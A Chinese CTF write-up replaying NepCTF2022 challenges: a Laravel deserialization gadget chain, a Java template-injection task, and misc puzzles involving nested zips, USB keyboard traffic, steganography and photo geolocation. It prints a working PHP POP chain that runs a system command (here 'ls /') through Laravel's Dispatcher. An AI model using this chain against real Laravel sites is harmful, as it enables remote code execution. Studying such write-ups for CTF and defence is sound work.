码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • [NepCTF2022] 复现


    Just Kidding

    顽皮的HRP用Laravel写了个项目来欢迎大伙来玩Nepctf 2nd,没想到…居然被坏蛋Sharun撅了

    www.zip源码泄露  ,啥也不懂没注意正确的入口在哪里,一直把注意力放在web.php上面 

    没有注意到这里use导入类的路径,跟着路径找到反序列化入口

     

    当时写的过程,确实9.12.2的版本也是用网上流传的9.1.8的链子可以打,

    当时就是没找到正确的入口和路径 

     

    https://github.com/1nhann/vulns/issues

    pop1,直接rce  

    1. namespace Illuminate\Contracts\Queue{
    2. interface ShouldQueue
    3. {
    4. //
    5. }
    6. }
    7. namespace Illuminate\Bus{
    8. class Dispatcher{
    9. protected $container;
    10. protected $pipeline;
    11. protected $pipes = [];
    12. protected $handlers = [];
    13. protected $queueResolver;
    14. function __construct()
    15. {
    16. $this->queueResolver = "system";
    17. }
    18. }
    19. }
    20. namespace Illuminate\Broadcasting{
    21. use Illuminate\Contracts\Queue\ShouldQueue;
    22. class BroadcastEvent implements ShouldQueue {
    23. function __construct()
    24. {
    25. }
    26. }
    27. class PendingBroadcast{
    28. protected $events;
    29. protected $event;
    30. function __construct()
    31. {
    32. $this->event = new BroadcastEvent();
    33. $this->event->connection = "ls /";
    34. $this->events = new \Illuminate\Bus\Dispatcher();
    35. }
    36. }
    37. }
    38. namespace{
    39. $a = new \Illuminate\Broadcasting\PendingBroadcast();
    40. echo base64_encode(serialize($a));
    41. }

     注意payload路径 ,上传后 访问源码可以看到成功rce的回显

     

    Challenger

    顽皮的HRP又换了种语言写项目来欢迎大家,没想到又让Sharun掘了

    java的框架,给了jar, 反编译

    目前没学过java,所以跟着wp走一遍,也是网上的链子打

     Java安全之Thymeleaf 模板注入分析 - nice_0e3 - 博客园

     

     

     

     

    签到题

    binwalk分离图片

    得到压缩包套娃

    1. import zipfile
    2. a=""
    3. for i in range(232,2,-1):
    4. a=str(i)+".zip"
    5. print(a)
    6. with zipfile.ZipFile(a) as zf:
    7. zf.extractall()

    芃哥给的脚本解压,解压到最后

     

    本来找密码爆破,其实是伪加密

    看文件名也知道是键盘流量了

    王一航Usb脚本梭

    少见的base 

    附件就一个jpg试了一下没出来啥信息就放下了,没想到是真签到

    JPHS这工具很少用就忘了, 无密码直接seek 就出来了

     base58 

     

    花花画画画花花 

    附件下载后 是个osz后缀, 当时用010看是压缩包文件头,就改后缀了。。。。

     要正确打开osz文件 

     osu打开,这个是个音乐游戏吧,

     

     

    馅饼?陷阱!

    右下角有个车牌琼,写的时候都没发现,尚德源茶 定位到三亚 发现正好是这里

    左上角就是银行

     

     

  • 相关阅读:
    [springmvc]springmvc的实现流程原理,以及快速创建一个三层架构项目
    如何在vi编辑器中复制内容到终端
    Kubernetes 基础
    c++初识之一
    读标准03-IEEE1451.5标准协议尝鲜实现
    Springboot毕设项目办公用品管理系统c1139(java+VUE+Mybatis+Maven+Mysql)
    Android两个应用同时使用后置摄像录像
    第六节:如何解决@ComponentScan只能扫描当前包及子包(自学Spring boot 3.x的第一天)
    微服务-开篇-个人对微服务的理解
    在本地电脑中如何用命令操作远程服务器上的数据库
  • 原文地址:https://blog.csdn.net/qq_61768489/article/details/125874427
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号